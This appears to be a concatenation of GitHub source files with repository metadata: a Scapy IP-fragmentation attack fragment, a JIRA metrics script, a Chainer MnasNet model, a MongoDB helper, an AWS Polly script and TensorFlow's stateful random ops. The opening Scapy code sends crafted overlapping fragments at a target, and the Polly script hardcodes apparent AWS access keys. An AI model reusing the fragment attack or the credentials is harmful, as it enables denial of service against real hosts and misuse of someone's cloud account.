send(i/load)
elif attack == '3':
print ("Using attack 3")
size=1336
offset=3
load1="\x00"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load1)
send(j/load2)
else: # attack == 4
print ("Using attack 4")
size=1300
offset=10
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load)
send(j/load)
print ("Done!")
| [
"mahdad.baghani@outlook.com"
] | mahdad.baghani@outlook.com |
0fc5f71bac55473da4ac79d53c9b5be29ec82c56 | 59f5b98b59bb20fb42decd8ca483e41eae485342 | /Project Metrics Processing Script.py | 68938c55f708a93346ee203c11d88917c430feb0 | [] | no_license | ikhoche/python_projects | 95316833e237953c5d49c8cc066cd9a15e729f31 | 14052ac1119fb3f31502909118fd226288415994 | refs/heads/master | 2023-01-06T15:26:02.875409 | 2020-11-02T19:14:38 | 2020-11-02T19:14:38 | 296,965,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,018 | py | #!/usr/bin/env python
# coding: utf-8
# This script creates a table from using data from JIRA and calculates how many User Stories and Bugs were Created and Resolved per day per project.
import pandas as pd
df = pd.read_csv(r'C:\Users\ishan.khoche\Documents\Project Metrics\Projec Metrics Dashboard Data_23Oct- Copy.csv') #Load File to be analyzed
fixedversion = df.loc[df['Fixed Version'] == 'ZS Web 2.0Mallorca'] # Enter Fixed Version
bug = fixedversion.loc[fixedversion['Issue Type'] == 'Bug']
bug['created date'] = pd.to_datetime(bug['Created']).dt.date
bug['Created/Resolved'] = 'Created' #add column to mark that these are created bugs
createdBugs = bug.groupby(['created date', 'Fixed Version','Created/Resolved']).size() #Count of Created/Day
bug['resolved date'] = pd.to_datetime(bug['Resolved']).dt.date
bug['Created/Resolved'] = 'Resolved' #add column to mark that these are resolved bugs
resolvedBugs = bug.groupby(['resolved date', 'Fixed Version','Created/Resolved']).size() #Count of Resolved/Day
#Change name of file below:
createdBugs.append(resolvedBugs).to_csv('ZS Web 2.0Mallorca_bugs.csv') # Create file with bugs created/resolved counts
userstories = fixedversion.loc[fixedversion['Issue Type'] == 'Story']
userstories['created date'] = pd.to_datetime(userstories['Created']).dt.date
userstories['Created/Resolved'] = 'Created' #add column to mark that these are created bugs
createduserstories = userstories.groupby(['created date', 'Fixed Version','Created/Resolved']).size() #Count of Created/Day
userstories['resolved date'] = pd.to_datetime(userstories['Resolved']).dt.date
userstories['Created/Resolved'] = 'Resolved' #add column to mark that these are resolved bugs
resolveduserstories = userstories.groupby(['resolved date', 'Fixed Version','Created/Resolved']).size() #Count of Resolved/Day
#Change name of file below:
createduserstories.append(resolveduserstories).to_csv('ZS Web 2.0Mallorca_us.csv') # Create file with bugs created/resolved counts
| [
"71572354+ikhoche@users.noreply.github.com"
] | 71572354+ikhoche@users.noreply.github.com |
c70f0f21ddbab3ceb6ab8740dc0a3da2d1b05679 | 8e52c27f1b2823db67db4438b2b7e22c18254eca | /chainer_/chainercv2/models/mnasnet.py | 7fc29a525f9eef9ba2765ae2e02a792b0197b0e0 | [
"MIT"
] | permissive | earhian/imgclsmob | 5582f5f2d4062b620eecc28d5c4c9245fea47291 | c87c0942420876941868c016211073dec4392e4d | refs/heads/master | 2020-04-12T02:13:55.258601 | 2018-12-17T20:38:19 | 2018-12-17T20:38:19 | 162,242,486 | 1 | 0 | MIT | 2018-12-18T06:40:42 | 2018-12-18T06:40:41 | null | UTF-8 | Python | false | false | 13,344 | py | """
MnasNet, implemented in Chainer.
Original paper: 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,' https://arxiv.org/abs/1807.11626.
"""
__all__ = ['MnasNet', 'mnasnet']
import os
import chainer.functions as F
import chainer.links as L
from chainer import Chain
from functools import partial
from chainer.serializers import load_npz
from .common import SimpleSequential
class ConvBlock(Chain):
"""
Standard convolution block with Batch normalization and ReLU activation.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the convolution.
pad : int or tuple/list of 2 int
Padding value for convolution layer.
groups : int, default 1
Number of groups.
activate : bool, default True
Whether activate the convolution block.
"""
def __init__(self,
in_channels,
out_channels,
ksize,
stride,
pad,
groups=1,
activate=True):
super(ConvBlock, self).__init__()
self.activate = activate
with self.init_scope():
self.conv = L.Convolution2D(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
pad=pad,
nobias=True,
groups=groups)
self.bn = L.BatchNormalization(
size=out_channels,
eps=1e-5)
if self.activate:
self.activ = F.relu
def __call__(self, x):
x = self.conv(x)
x = self.bn(x)
if self.activate:
x = self.activ(x)
return x
def conv1x1_block(in_channels,
out_channels,
activate=True):
"""
1x1 version of the standard convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
activate : bool, default True
Whether activate the convolution block.
"""
return ConvBlock(
in_channels=in_channels,
out_channels=out_channels,
ksize=1,
stride=1,
pad=0,
groups=1,
activate=activate)
def dwconv_block(in_channels,
out_channels,
ksize,
stride,
activate=True):
"""
Depthwise version of the standard convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the convolution.
activate : bool, default True
Whether activate the convolution block.
"""
return ConvBlock(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
pad=(ksize // 2),
groups=out_channels,
activate=activate)
class DwsConvBlock(Chain):
"""
Depthwise separable convolution block with BatchNorms and activations at each convolution layers.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
"""
def __init__(self,
in_channels,
out_channels):
super(DwsConvBlock, self).__init__()
with self.init_scope():
self.dw_conv = dwconv_block(
in_channels=in_channels,
out_channels=in_channels,
ksize=3,
stride=1)
self.pw_conv = conv1x1_block(
in_channels=in_channels,
out_channels=out_channels)
def __call__(self, x):
x = self.dw_conv(x)
x = self.pw_conv(x)
return x
class MnasUnit(Chain):
"""
MnasNet unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the second convolution layer.
expansion_factor : int
Factor for expansion of channels.
"""
def __init__(self,
in_channels,
out_channels,
ksize,
stride,
expansion_factor):
super(MnasUnit, self).__init__()
self.residual = (in_channels == out_channels) and (stride == 1)
mid_channels = in_channels * expansion_factor
with self.init_scope():
self.conv1 = conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
activate=True)
self.conv2 = dwconv_block(
in_channels=mid_channels,
out_channels=mid_channels,
ksize=ksize,
stride=stride,
activate=True)
self.conv3 = conv1x1_block(
in_channels=mid_channels,
out_channels=out_channels,
activate=False)
def __call__(self, x):
if self.residual:
identity = x
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
if self.residual:
x = x + identity
return x
class MnasInitBlock(Chain):
"""
MnasNet specific initial block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of 2 int
Numbers of output channels.
"""
def __init__(self,
in_channels,
out_channels_list):
super(MnasInitBlock, self).__init__()
with self.init_scope():
self.conv1 = ConvBlock(
in_channels=in_channels,
out_channels=out_channels_list[0],
ksize=3,
stride=2,
pad=1,
groups=1,
activate=True)
self.conv2 = DwsConvBlock(
in_channels=out_channels_list[0],
out_channels=out_channels_list[1])
def __call__(self, x):
x = self.conv1(x)
x = self.conv2(x)
return x
class MnasNet(Chain):
"""
MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
https://arxiv.org/abs/1807.11626.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : list of 2 int
Numbers of output channels for the initial unit.
final_block_channels : int
Number of output channels for the final block of the feature extractor.
ksizes : list of list of int
Number of kernel sizes for each unit.
expansion_factors : list of list of int
Number of expansion factors for each unit.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
channels,
init_block_channels,
final_block_channels,
ksizes,
expansion_factors,
in_channels=3,
in_size=(224, 224),
classes=1000):
super(MnasNet, self).__init__()
self.in_size = in_size
self.classes = classes
with self.init_scope():
self.features = SimpleSequential()
with self.features.init_scope():
setattr(self.features, "init_block", MnasInitBlock(
in_channels=in_channels,
out_channels_list=init_block_channels))
in_channels = init_block_channels[-1]
for i, channels_per_stage in enumerate(channels):
ksizes_per_stage = ksizes[i]
expansion_factors_per_stage = expansion_factors[i]
stage = SimpleSequential()
with stage.init_scope():
for j, out_channels in enumerate(channels_per_stage):
ksize = ksizes_per_stage[j]
expansion_factor = expansion_factors_per_stage[j]
stride = 2 if (j == 0) else 1
setattr(stage, "unit{}".format(j + 1), MnasUnit(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
expansion_factor=expansion_factor))
in_channels = out_channels
setattr(self.features, "stage{}".format(i + 1), stage)
setattr(self.features, 'final_block', conv1x1_block(
in_channels=in_channels,
out_channels=final_block_channels,
activate=True))
in_channels = final_block_channels
setattr(self.features, 'final_pool', partial(
F.average_pooling_2d,
ksize=7,
stride=1))
self.output = SimpleSequential()
with self.output.init_scope():
setattr(self.output, 'flatten', partial(
F.reshape,
shape=(-1, in_channels)))
setattr(self.output, 'fc', L.Linear(
in_size=in_channels,
out_size=classes))
def __call__(self, x):
x = self.features(x)
x = self.output(x)
return x
def get_mnasnet(model_name=None,
pretrained=False,
root=os.path.join('~', '.chainer', 'models'),
**kwargs):
"""
Create MnasNet model with specific parameters.
Parameters:
----------
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
init_block_channels = [32, 16]
final_block_channels = 1280
layers = [3, 3, 3, 2, 4, 1]
downsample = [1, 1, 1, 0, 1, 0]
channels_per_layers = [24, 40, 80, 96, 192, 320]
expansion_factors_per_layers = [3, 3, 6, 6, 6, 6]
ksizes_per_layers = [3, 5, 5, 3, 5, 3]
default_kernel_size = 3
from functools import reduce
channels = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
zip(channels_per_layers, layers, downsample), [])
ksizes = reduce(lambda x, y: x + [[y[0]] + [default_kernel_size] * (y[1] - 1)] if y[2] != 0 else x[:-1] + [
x[-1] + [y[0]] + [default_kernel_size] * (y[1] - 1)], zip(ksizes_per_layers, layers, downsample), [])
expansion_factors = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
zip(expansion_factors_per_layers, layers, downsample), [])
net = MnasNet(
channels=channels,
init_block_channels=init_block_channels,
final_block_channels=final_block_channels,
ksizes=ksizes,
expansion_factors=expansion_factors,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
load_npz(
file=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
obj=net)
return net
def mnasnet(**kwargs):
"""
MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
https://arxiv.org/abs/1807.11626.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
return get_mnasnet(model_name="mnasnet", **kwargs)
def _test():
import numpy as np
import chainer
chainer.global_config.train = False
pretrained = False
models = [
mnasnet,
]
for model in models:
net = model(pretrained=pretrained)
weight_count = net.count_params()
print("m={}, {}".format(model.__name__, weight_count))
assert (model != mnasnet or weight_count == 4308816)
x = np.zeros((1, 3, 224, 224), np.float32)
y = net(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
| [
"osemery@gmail.com"
] | osemery@gmail.com |
486f6508072f88d8dd80018dc3c1ea5bfc69e04c | 8333a1c076d723b3cda7efd2eb9d3ac8b83b59da | /flask_code/db_functions.py | 7e1e82588f2630757083912c58e0b171e95c1950 | [] | no_license | ykrasnikov/Crypto_vs_Market | c6dfe9fa22980feae9fbd2647705eb3766dbc119 | 65926ec173843a44dc8ef73705338e92dd3c0e5b | refs/heads/main | 2023-05-31T11:48:38.551658 | 2021-07-04T18:34:53 | 2021-07-04T18:34:53 | 349,805,791 | 1 | 0 | null | 2021-03-20T18:31:12 | 2021-03-20T18:31:12 | null | UTF-8 | Python | false | false | 1,125 | py | #####################################################################
################### Import libraries
#####################################################################
import datetime as dt
# database querry
from pymongo import MongoClient
from bson.json_util import dumps
import dns.resolver
#from bson.json_util import dumps
from secrets import password
from secrets import user
#####################################################################
################### Database Connection
#####################################################################
def db_search(date,currency):
print("DB_serach input",date,currency)
# Initialize PyMongo to work with MongoDBs
conn = f'mongodb+srv://{user}:{password}@cluster0.yicgz.mongodb.net/Crypto_vs_Market?retryWrites=true&w=majority'
client = MongoClient(conn)
#Define database and collection
db=client.Crypto_vs_Market
collection=db.crypto_history
record=collection.find()
print('db_search ', list(record))
request_json=json.dumps(list(record))
#request_json={"l":"990"}
client.close()
return request_json | [
"ykrasnikov@gmail.com"
] | ykrasnikov@gmail.com |
acdf4478b5546f9e5507cf046848c3422ddbdce4 | c73a435be9bed95cd770eb28f5cd671b75d23d2e | /tts_polly.py | 0651e64ba4ce7754ba2f7f23a661de6ee5cae79f | [] | no_license | Lim-Wee-Meng/python | 1cc2434f0a45b8642440cb09ff5438b9a0229cb3 | e84de5b149a000c4f01ccfda0c02ab61ac0de9eb | refs/heads/main | 2023-05-02T19:52:37.416810 | 2021-05-30T08:29:23 | 2021-05-30T08:29:23 | 371,625,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | import boto3
polly_client = boto3.Session(
aws_access_key_id=AKIAWDNZVY5V7JVCY7N6,
aws_secret_access_key=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,
region_name='ap-southeast-1').client('Remy_TTS')
response = polly_client.synthesize_speech(VoiceId='Joanna',
OutputFormat='mp3',
Text = 'This is a sample text to be synthesized.')
file = open('speech.mp3', 'wb')
file.write(response['AudioStream'].read())
file.close()
| [
"noreply@github.com"
] | Lim-Wee-Meng.noreply@github.com |
b302b13d664f632886e2fab3aed08f727a416d21 | 81e706b69c789aff05691c41fa79156942927f82 | /site-packages/tensorflow/python/ops/stateful_random_ops.py | d27c20ca03006d7837c891f41ea4f308918b8e56 | [] | no_license | yoncho/OpenCV-code | f5a1091ef32f3c8c3254ab93e083950b84c4fabd | bda2f793b11462e67c7ab644b342beffb871e3de | refs/heads/master | 2023-03-30T12:01:23.521511 | 2021-04-01T13:45:44 | 2021-04-01T13:45:44 | 291,398,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,862 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating random numbers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_stateful_random_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.util.tf_export import tf_export
# A seed for random ops (stateful and stateless) will always be 1024
# bits, all of which will be sent to the C++ code. The actual C++
# implementation of some algorithms may only use a lower part of the bits.
MAX_INT64 = 2**63 - 1
MIN_INT64 = -(2**63)
UINT64_SPAN = 2**64
# 'Variable' doesn't support uint32 or uint64 yet (due to reasons explained in
# b/111604096 and cl/171681867), so I use signed int here. I choose int64
# instead of int32 here because `VarHandleOp` doesn't support int32 on GPU.
SEED_TYPE = "int64"
SEED_MIN = MIN_INT64
SEED_MAX = MAX_INT64
SEED_UINT_SPAN = UINT64_SPAN
SEED_TYPE_BITS = 64
SEED_BIT_MASK = 0xFFFFFFFFFFFFFFFF
SEED_SIZE = 16 # in units of SEED_TYPE
STATE_TYPE = SEED_TYPE
ALGORITHM_TYPE = STATE_TYPE
RNG_ALG_PHILOX = 1
RNG_ALG_THREEFRY = 2
DEFAULT_ALGORITHM = RNG_ALG_PHILOX
PHILOX_STATE_SIZE = 3
THREEFRY_STATE_SIZE = 2
def non_deterministic_ints(shape, dtype=dtypes.int64):
"""Non-deterministically generates some integers.
This op may use some OS-provided source of non-determinism (e.g. an RNG), so
each execution will give different results.
Args:
shape: the shape of the result.
dtype: (optional) the dtype of the result.
Returns:
a tensor whose element values are non-deterministically chosen.
"""
return gen_stateful_random_ops.non_deterministic_ints(
shape=shape, dtype=dtype)
def _uint_to_int(n):
if n > SEED_MAX:
n = n - SEED_UINT_SPAN
return n
def _make_1d_state(state_size, seed):
"""Makes a 1-D RNG state.
Args:
state_size: an integer.
seed: an integer or 1-D tensor.
Returns:
a 1-D tensor of shape [state_size] and dtype STATE_TYPE.
"""
int_types = (int,) if sys.version_info >= (3, 0) else (int, long)
if isinstance(seed, int_types):
# chop the Python integer (infinite precision) into chunks of SEED_TYPE
ls = []
for _ in range(state_size):
ls.append(seed & SEED_BIT_MASK)
seed >>= SEED_TYPE_BITS
seed = ls
# to avoid overflow error from np.asarray
seed = list(map(_uint_to_int, seed))
seed = np.asarray(seed, dtype=STATE_TYPE)
if len(seed.shape) != 1:
raise ValueError(
"seed should only have one dimension; got shape: %s" % seed.shape)
seed = seed[0:state_size]
# Padding with zeros on the *left* if too short. Padding on the right would
# cause a small seed to be used as the "counter" while the "key" is always
# zero (for counter-based RNG algorithms), because in the current memory
# layout counter is stored before key. In such a situation two RNGs with
# two different small seeds may generate overlapping outputs.
seed_size = seed.shape[0]
if seed_size < state_size:
seed = np.pad(
seed, [(state_size - seed_size, 0)],
mode="constant",
constant_values=0)
assert seed.shape == (state_size,), "Wrong seed.shape: %s" % seed.shape
return seed
def _get_state_size(alg):
if alg == RNG_ALG_PHILOX:
return PHILOX_STATE_SIZE
elif alg == RNG_ALG_THREEFRY:
return THREEFRY_STATE_SIZE
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def _make_state_from_seed(seed, alg):
return _make_1d_state(_get_state_size(alg), seed)
@tf_export("random.experimental.create_rng_state")
def create_rng_state(seed, algorithm):
"""Creates a RNG state.
Args:
seed: an integer or 1-D tensor.
algorithm: an integer representing the RNG algorithm.
Returns:
a 1-D tensor whose size depends on the algorithm.
"""
return _make_state_from_seed(seed, algorithm)
def _shape_tensor(shape):
"""Convert to an int32 or int64 tensor, defaulting to int64 if empty."""
if isinstance(shape, (tuple, list)) and not shape:
dtype = dtypes.int64
else:
dtype = None
return ops.convert_to_tensor(shape, dtype=dtype, name="shape")
def _convert_to_state_tensor(t):
if isinstance(t, list):
# to avoid out-of-range error from ops.convert_to_tensor
t = list(map(_uint_to_int, t))
return ops.convert_to_tensor(t, dtype=STATE_TYPE)
@tf_export("random.experimental.Generator")
class Generator(tracking.AutoTrackable):
  """Random-number generator.

  It uses Variable to manage its internal state, and allows choosing an
  Random-Number-Generation (RNG) algorithm.

  CPU, GPU and TPU with the same algorithm and seed will generate the same
  integer random numbers. Float-point results (such as the output of `normal`)
  may have small numerical discrepancies between CPU and GPU.
  """

  def __init__(self, copy_from=None, state=None, alg=None):
    """Creates a generator.

    The new generator will be initialized by one of the following ways, with
    decreasing precedence:
    (1) If `copy_from` is not None, the new generator is initialized by copying
        information from another generator.
    (2) If `state` and `alg` are not None (they must be set together), the new
        generator is initialized by a state.

    Args:
      copy_from: a generator to be copied from.
      state: a vector of dtype STATE_TYPE representing the initial state of the
        RNG, whose length and semantics are algorithm-specific.
      alg: the RNG algorithm. Possible values are RNG_ALG_PHILOX for the
        Philox algorithm and RNG_ALG_THREEFRY for the ThreeFry
        algorithm (see paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
        [https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]).
    """
    if copy_from is not None:
      # All other arguments should be None
      assert (alg or state) is None
      self._state_var = variables.Variable(copy_from.state, dtype=STATE_TYPE,
                                           trainable=False)
      self._alg_var = copy_from.algorithm
    else:
      assert alg is not None and state is not None
      state = _convert_to_state_tensor(state)
      state.shape.assert_is_compatible_with([_get_state_size(alg)])
      self._state_var = variables.Variable(state, dtype=STATE_TYPE,
                                           trainable=False)
      self._alg_var = alg

  @classmethod
  def from_state(cls, state, alg):
    """Creates a generator from a state.

    See `__init__` for description of `state` and `alg`.

    Args:
      state: the new state.
      alg: the RNG algorithm.

    Returns:
      The new generator.
    """
    return cls(alg=alg, state=state)

  @classmethod
  def from_seed(cls, seed, alg=None):
    """Creates a generator from a seed.

    A seed is a 1024-bit unsigned integer represented either as a Python
    integer or a vector of integers. Seeds shorter than 1024-bit will be
    padded. The padding, the internal structure of a seed and the way a seed
    is converted to a state are all opaque (unspecified). The only semantics
    specification of seeds is that two different seeds are likely to produce
    two independent generators (but no guarantee).

    Args:
      seed: the seed for the RNG.
      alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
        `__init__` for its possible values.

    Returns:
      The new generator.
    """
    if alg is None:
      # TODO(wangpeng): more sophisticated algorithm selection
      alg = DEFAULT_ALGORITHM
    state = create_rng_state(seed, alg)
    return cls(state=state, alg=alg)

  @classmethod
  def from_non_deterministic_state(cls, alg=None):
    """Creates a generator by non-deterministically initializing its state.

    The source of the non-determinism will be platform- and time-dependent.

    Args:
      alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
        `__init__` for its possible values.

    Returns:
      The new generator.
    """
    if alg is None:
      # TODO(wangpeng): more sophisticated algorithm selection
      alg = DEFAULT_ALGORITHM
    state = non_deterministic_ints(shape=[_get_state_size(alg)],
                                   dtype=SEED_TYPE)
    return cls(state=state, alg=alg)

  @classmethod
  def from_key_counter(cls, key, counter, alg):
    """Creates a generator from a key and a counter.

    This constructor only applies if the algorithm is a counter-based algorithm.
    See method `key` for the meaning of "key" and "counter".

    Args:
      key: the key for the RNG, a scalar of type STATE_TYPE.
      counter: a vector of dtype STATE_TYPE representing the initial counter for
        the RNG, whose length is algorithm-specific.
      alg: the RNG algorithm. If None, it will be auto-selected. See
        `__init__` for its possible values.

    Returns:
      The new generator.
    """
    counter = _convert_to_state_tensor(counter)
    key = _convert_to_state_tensor(key)
    # Counter occupies all but the last element of the state; key is last.
    counter.shape.assert_is_compatible_with([_get_state_size(alg) - 1])
    key.shape.assert_is_compatible_with([])
    key = array_ops.reshape(key, [1])
    state = array_ops.concat([counter, key], 0)
    return cls(state=state, alg=alg)

  def reset(self, state):
    """Resets the generator by a new state.

    See `__init__` for the meaning of "state".

    Args:
      state: the new state.
    """
    state = _convert_to_state_tensor(state)
    state.shape.assert_is_compatible_with([_get_state_size(self.algorithm)])
    self._state_var.assign(state)

  def reset_from_seed(self, seed):
    """Resets the generator by a new seed.

    See `from_seed` for the meaning of "seed".

    Args:
      seed: the new seed.
    """
    state = create_rng_state(seed, self.algorithm)
    self._state_var.assign(state)

  def reset_from_key_counter(self, key, counter):
    """Resets the generator by a new key-counter pair.

    See `from_key_counter` for the meaning of "key" and "counter".

    Args:
      key: the new key.
      counter: the new counter.
    """
    counter = _convert_to_state_tensor(counter)
    key = _convert_to_state_tensor(key)
    counter.shape.assert_is_compatible_with(
        [_get_state_size(self.algorithm) - 1])
    key.shape.assert_is_compatible_with([])
    key = array_ops.reshape(key, [1])
    state = array_ops.concat([counter, key], 0)
    self._state_var.assign(state)

  @property
  def state(self):
    """The internal state of the RNG."""
    return self._state_var

  @property
  def algorithm(self):
    """The RNG algorithm."""
    return self._alg_var

  def _standard_normal(self, shape, dtype):
    # Draws standard-normal samples, advancing the state variable in place.
    return gen_stateful_random_ops.stateful_standard_normal_v2(
        self.state.handle, self.algorithm, shape, dtype=dtype)

  @property
  def key(self):
    """The 'key' part of the state of a counter-based RNG.

    For a counter-base RNG algorithm such as Philox and ThreeFry (as
    described in paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
    [https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]),
    the RNG state consists of two parts: counter and key. The output is
    generated via the formula: output=hash(key, counter), i.e. a hashing of
    the counter parametrized by the key. Two RNGs with two different keys can
    be thought as generating two independent random-number streams (a stream
    is formed by increasing the counter).

    Returns:
      A scalar which is the 'key' part of the state, if the RNG algorithm is
        counter-based; otherwise it raises a ValueError.
    """
    alg = self.algorithm
    if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
      # The key is stored as the last element of the state vector.
      return self._state_var[-1]
    else:
      raise ValueError("Unsupported algorithm id: %s" % alg)

  def skip(self, delta):
    """Advance the counter of a counter-based RNG.

    Args:
      delta: the amount of advancement. The state of the RNG after
        `skip(n)` will be the same as that after `normal([n])`
        (or any other distribution). The actual increment added to the
        counter is an unspecified implementation detail.
    """
    gen_stateful_random_ops.rng_skip(self.state.handle, self.algorithm, delta)

  # The following functions return a tensor and as a side effect update
  # self._state_var.
  def normal(self, shape, mean=0.0, stddev=1.0, dtype=dtypes.float32,
             name=None):
    """Outputs random values from a normal distribution.

    Args:
      shape: A 1-D integer Tensor or Python array. The shape of the output
        tensor.
      mean: A 0-D Tensor or Python value of type `dtype`. The mean of the normal
        distribution.
      stddev: A 0-D Tensor or Python value of type `dtype`. The standard
        deviation of the normal distribution.
      dtype: The type of the output.
      name: A name for the operation (optional).

    Returns:
      A tensor of the specified shape filled with random normal values.
    """
    with ops.name_scope(name, "stateful_normal", [shape, mean, stddev]) as name:
      shape = _shape_tensor(shape)
      mean = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
      stddev = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
      rnd = self._standard_normal(shape, dtype=dtype)
      return math_ops.add(rnd * stddev, mean, name=name)

  def _truncated_normal(self, shape, dtype):
    # Truncated-normal kernel; advances the state variable in place.
    return gen_stateful_random_ops.stateful_truncated_normal(
        self.state.handle, self.algorithm, shape, dtype=dtype)

  def truncated_normal(self, shape,
                       mean=0.0,
                       stddev=1.0,
                       dtype=dtypes.float32,
                       name=None):
    """Outputs random values from a truncated normal distribution.

    The generated values follow a normal distribution with specified mean and
    standard deviation, except that values whose magnitude is more than
    2 standard deviations from the mean are dropped and re-picked.

    Args:
      shape: A 1-D integer Tensor or Python array. The shape of the output
        tensor.
      mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
        truncated normal distribution.
      stddev: A 0-D Tensor or Python value of type `dtype`. The standard
        deviation of the normal distribution, before truncation.
      dtype: The type of the output.
      name: A name for the operation (optional).

    Returns:
      A tensor of the specified shape filled with random truncated normal
        values.
    """
    with ops.name_scope(
        name, "truncated_normal", [shape, mean, stddev]) as name:
      shape_tensor = _shape_tensor(shape)
      mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
      stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
      rnd = self._truncated_normal(shape_tensor, dtype=dtype)
      mul = rnd * stddev_tensor
      return math_ops.add(mul, mean_tensor, name=name)

  def _uniform(self, shape, dtype):
    # Uniform [0, 1) kernel for float dtypes; advances the state in place.
    return gen_stateful_random_ops.stateful_uniform(
        self.state.handle, self.algorithm, shape=shape, dtype=dtype)

  def uniform(self, shape, minval=0, maxval=None,
              dtype=dtypes.float32, name=None):
    """Outputs random values from a uniform distribution.

    The generated values follow a uniform distribution in the range
    `[minval, maxval)`. The lower bound `minval` is included in the range, while
    the upper bound `maxval` is excluded. (For float numbers especially
    low-precision types like bfloat16, because of
    rounding, the result may sometimes include `maxval`.)

    For floats, the default range is `[0, 1)`. For ints, at least `maxval` must
    be specified explicitly.

    In the integer case, the random integers are slightly biased unless
    `maxval - minval` is an exact power of two. The bias is small for values of
    `maxval - minval` significantly smaller than the range of the output (either
    `2**32` or `2**64`).

    Args:
      shape: A 1-D integer Tensor or Python array. The shape of the output
        tensor.
      minval: A 0-D Tensor or Python value of type `dtype`. The lower bound on
        the range of random values to generate. Defaults to 0.
      maxval: A 0-D Tensor or Python value of type `dtype`. The upper bound on
        the range of random values to generate. Defaults to 1 if `dtype` is
        floating point.
      dtype: The type of the output.
      name: A name for the operation (optional).

    Returns:
      A tensor of the specified shape filled with random uniform values.

    Raises:
      ValueError: If `dtype` is integral and `maxval` is not specified.
    """
    dtype = dtypes.as_dtype(dtype)
    if maxval is None:
      if dtype.is_integer:
        raise ValueError("Must specify maxval for integer dtype %r" % dtype)
      maxval = 1
    with ops.name_scope(name, "stateful_uniform",
                        [shape, minval, maxval]) as name:
      shape = _shape_tensor(shape)
      minval = ops.convert_to_tensor(minval, dtype=dtype, name="min")
      maxval = ops.convert_to_tensor(maxval, dtype=dtype, name="max")
      if dtype.is_integer:
        # Integer case uses a dedicated kernel to avoid float rounding bias.
        return gen_stateful_random_ops.stateful_uniform_int(
            self.state.handle, self.algorithm, shape=shape,
            minval=minval, maxval=maxval, name=name)
      else:
        rnd = self._uniform(shape=shape, dtype=dtype)
        return math_ops.add(rnd * (maxval - minval), minval, name=name)

  def uniform_full_int(self, shape, dtype=dtypes.uint64, name=None):
    """Uniform distribution on an integer type's entire range.

    The other method `uniform` only covers the range [minval, maxval), which
    cannot be `dtype`'s full range because `maxval` is of type `dtype`.

    Args:
      shape: the shape of the output.
